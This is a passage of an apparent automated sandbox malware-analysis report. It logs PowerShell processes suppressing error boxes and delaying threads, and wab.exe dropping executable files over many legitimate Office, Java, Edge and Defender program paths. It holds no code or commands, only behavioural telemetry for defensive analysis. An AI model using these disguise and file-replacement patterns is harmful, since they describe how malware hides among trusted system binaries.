              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4460Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5418Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5858Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3995Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Windows\svchost.comJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to dropped file
